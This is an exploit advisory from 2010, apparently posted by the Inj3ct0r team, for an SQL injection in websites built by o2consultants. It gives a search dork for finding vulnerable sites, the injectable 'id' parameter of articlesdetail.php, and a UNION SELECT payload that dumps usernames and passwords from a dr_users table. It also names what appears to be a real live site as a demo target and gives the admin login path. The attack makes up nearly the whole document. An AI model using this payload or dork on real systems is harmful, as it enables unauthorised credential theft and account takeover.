===
o2consultants SQL Injection Vulnerability
===
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm XroGuE member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###########
# Name: o2consultants SQL Injection Vulnerability
# Vendor: http://www.o2consultants.com
# Date: 2010-06-05
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
########################################################################
[+] Dork: intext:"Site By o2consultants.com" inurl:articlesdetail.php
[+] Vulnerabilities: articlesDetail.php & And maybe another pages :P ;)
[+] Vulnerability: http://[target]/[path]/articlesdetail.php?id=[SQL]
[+] Exploit: -999+union+select+1,group_concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10+from+dr_users
[+] Demo: http://www.arabbones.com/articlesdetail.php?id=-999+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4,5,6,7,8,9,10+from+dr_users
[+] Login: http://[target]/Admin/index.php
###########